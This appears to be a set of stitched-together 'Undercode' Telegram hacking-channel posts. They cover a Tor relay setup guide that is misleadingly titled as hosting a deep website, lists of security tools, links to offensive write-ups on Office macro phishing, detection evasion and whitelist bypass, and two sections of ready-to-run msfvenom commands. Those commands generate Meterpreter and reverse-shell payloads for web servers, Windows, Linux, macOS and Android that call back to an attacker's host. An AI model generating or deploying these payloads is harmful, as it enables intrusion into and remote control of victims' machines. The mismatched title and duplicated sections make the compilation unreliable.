▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW CREATE & HOST DEEPWEBSITE By Undercode :

> Become a volunteer against Internet tracking: how to build Tor (Onion Network) nodes :

1️⃣Preparation

If you plan to build a non-exit relay (non-exit relay), that is, an entry node (guard relay) and a relay node (middle relay), then you need to prepare:

1) A server with at least 512MB of memory, basically still available PC can meet the requirements, it is recommended to use VPS or hosting;

2) Stable Internet access, at least 10Mbps network bandwidth, and a public IPv4 address that can be maintained for at least a few hours (recommended to use a fixed IP address). In addition, if the ISP provides an IPv6 address, don’t forget to add For it, Tor needs IPv6 nodes very much (currently, it does not support pure IPv6);
At least 2 hours of operation time per day, 24 hours operation is

🦑recommended;

1) Elementary system maintenance and usage skills of text editor (such as vi) .

2) If you plan to set up an egress node, the situation becomes more complicated, because the egress node needs to be responsible for the traffic from Tor users (the server will think that the egress node IP user is accessing itself). Due to Tor's high anonymity, there are so many pirated P2P downloads, network attacks, and spams initiated by Tor that you cannot completely prevent them from passing through your exit node. Therefore, there are some additional requirements for setting up exit nodes:

3) A server, VPS or cloud host dedicated to the exit node should not run other network services;

ISP must allow egress nodes to be set up ( click here to view the
attitude of various VPS and hosting providers to Tor ), generally data centers, universities, non-profit organizations, and never set up egress nodes in their own homes or companies;

4) A fixed public IPv4 address dedicated to the egress node, on which other network services should not be running (again, if the ISP provides an IPv6 address, don’t forget to add it during configuration);

5) (Optional) ISP can provide customized WHOIS and rDNS information to avoid some troubles;
Give some energy to deal with abuse letters , such as DMCA complaints, etc., otherwise the service may be shut down by the ISP or face legal issues.

6) Most Tor nodes are based on the Linux (mainly Debian) operating system, but Tor Project advocates diversity, so it is also welcome to use the BSD operating system to build Tor

2️⃣ Installation :

1) Debian is used as an example here For configuration methods under other operating systems, please refer to here .

2) Execute the following command in the terminal to install the Tor server (requires sudo or operate under the root user, the same below):

> apt update && apt install tor

3) Three, configuration
Tor's configuration file is named "torrc" and is located in /etc/tor.

> Use a text editor to open it:

> vi /etc/tor/torrc
It can be found that a lot of content has been commented out ("#" before the text) in the file, you can uncomment the required parameters to make them effective, or write the required parameters at the end of the file.

🦑A typical configuration file must have the following basic parameters:

Nickname name Undercode-Testing
ORPort 9001
ORPort [IPv6-address]:9001 \
ExitRelay 0
IPv6Exit 0
SocksPort 0
ControlSocket 0
ContactInfo name@domain
VPS or leased servers often have traffic restrictions. You can avoid premature exhaustion of traffic by controlling bandwidth and Tor running time:

1) AccountingMax N bytes|KBytes|MBytes|GBytes|TBytes|KBits|MBits|GBits|TBits
AccountingStart day|week|month [day] HH:MM

2) Please note that high-speed and time-limited nodes are more practical than nodes that have been running at low speeds. In addition, the Tor network will also automatically adjust the workload assigned to the nodes by wayfinding weights (to be mentioned later) to properly extend the working hours of the nodes.

3) If this is an exit node, it is recommended to configure the outbound rules , which determines which ports of the other hosts on the Internet that the exit node can access. Careful configuration of outbound rules can prevent nodes from being abused by hackers. For example, port 3389 is forbidden to prevent nodes from being used to perform remote desktop brute force cracking. Of course, if you want to minimize abuse letters, you can only open ports 80 and 443, and only provide the most basic web browsing service for Tor browser users.

4) The outbound rule configuration parameters are as follows (wildcards can be used for both address and port):

exitpolicy accept *:port
exitpolicy reject *:port
exitpolicy accept *:*
exitpolicy reject *:*
If you do not configure the outbound rules, but only turn on the exit node switch, Tor will use the following default rules:

reject 0.0.0.0/8:*
reject 169.254.0.0/16:*
reject 127.0.0.0/8:*
reject 192.168.0.0/16:*
reject 10.0.0.0/8:*
reject 172.16.0.0/12:*
reject self-ip:*
reject *:25
reject *:119
reject *:135-139
reject *:445
reject *:563
reject *:1214
reject *:4661-4666
reject *:6346-6429
reject *:6699
reject *:6881-6999
accept *:*

🦑After editing, save and exit the text editor, execute the following command to restart Tor:

systemctl restart tor@default

4️⃣ Inspection and maintenance :

1) After the node is set up, you can use the "netstat -an" command to check whether your node service listening port has established a TCP connection. In addition,

2) it is recommended to search for your own node by using the IP address or nickname as a keyword in Tor Metrics to check its operating status, where "Fingerprint" is the unique identity of the node, and "Consensus Weight" is the pathfinding weight of the node (and bandwidth (It depends on the duration of the operation. The larger the number, the easier it is to select).

3) If you want to better monitor the node's running status and system resource usage in real time, it is recommended to install nyx :

> apt-get install nyx

> pip install nyx

> After the installation is complete, add the following parameters to the torrc file:

> ControlPort 9051

> CookieAuthentication 1

3) After the configuration is complete, you can start nyx directly in the terminal (note the user rights), and press the q key twice to exit.


🦑WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Exploits & #Bugs New :


[Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)

CVE-2017-0199 Toolkit


[Window Signed Binary](https://github.com/vysec/Windows-SignedBinary)

Wepwnise

[Bash Bunny](https://hakshop.com/products/bash-bunny)

Generate Macro - Tool

[How To: Empiresa Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/)

Excel macros with PowerShell

[PowerPoint and Custom Actions](https://phishme.com/powerpoint-and-custom-actions/)

MS Signed mimikatz in just 3 steps

[Hiding your process from sysinternals](https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/)

Luckystrike: An Evil Office Document Generator

[The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html)

Macro-less Code Exec in MSWord

[Multi-Platform Macro Phishing Payloads](https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)

Macroless DOC malware that avoids detection with Yara rule

[Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/)

Powershell without Powershell to bypass app whitelist/

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

SUPPORT & SHARE :

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Web #Payloads Commands Metasploit



1️⃣msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php

2️⃣ Creates a Simple TCP Shell for PHP

3️⃣ msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp

4️⃣Creates a Simple TCP Shell for ASP

5️⃣msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

6️⃣ Creates a Simple TCP Shell for Javascript

7️⃣ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war`

8️⃣ Creates a Simple TCP Shell for WAR

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Open Source #Threat Intelligence

- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.

- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 IP address and DNS #Lookup Tools 2020 :

- bgp

- Bgpview

- DataSploit (IP Address Modules)

- Domain Dossier

- Domaintoipconverter

- Googleapps Dig

- Hurricane Electric BGP Toolkit

- ICANN Whois

- Massdns

- Mxtoolbox

- Ultratools ipv6Info

- Viewdns

- Umbrella (OpenDNS) Popularity List

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Public Pen Testing Reports recommended :

> The following are several resources that are useful when writing penetration testing reports, including many different examples:


1️⃣Curated List of penetration testing reports | https://
github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |

2️⃣ SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |

3️⃣ Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |

4️⃣ PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |

5️⃣ Dradis Framework | https://dradisframework.com/ce/ |

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Creating Binaries with metasploit :

1) - msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

2) - Creates a simple TCP Payload for Windows
- msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

3) - Creates a simple HTTP Payload for Windows
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf

4) - Creates a simple TCP Shell for Linux

5) - msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho

6) - Creates a simple TCP Shell for Mac

7) - msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk

8) - Creates a simple TCP Payload for Android


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Shell Script Development :

- ansi - ANSI escape codes in pure bash

- change text color, position the cursor, much more

- argbash - Bash argument parsing code generator

- assert.sh - Bash unit testing framework

- BashScriptTestingLibrary - A unit testing framework for Bash scripts

- bash3boilerplate - Templates to write better Bash scripts

- bashful - A collection of libraries to simplify writing Bash scripts

- bashmanager - mini bash framework for creating command line tools

- bats - Bash Automated Testing System

- bash_unit - bash unit testing enterprise edition framework for professionals

- mo - Mustache templates in pure bash

- semver_bash - Semantic Versioning in Bash

- shfmt - Format bash programs

- shunit2 - A unit test framework for
Bash scripts with a flavour of JUnit/PyUnit

- bashing - Smashing Bash into Pieces

- Bash framework for creating command line tools

- shellcheck - ShellCheck, a static analysis tool for shell scripts

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

2020 Verified Cve SpotOutlook Crash 100/100

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Android Security Editing 2020 resources :

- Android Developer Studio

- APKtool

- dex2jar

- Bytecode Viewer

- IDA Pro

- Android Reverse Engineering Arsenals

@UndercodeSecurity
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Android Security Editing 2020 resources :

- Android Developer Studio

- APKtool

- dex2jar

- Bytecode Viewer

- IDA Pro

- Android Reverse Engineering Arsenals

@UndercodeSecurity
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁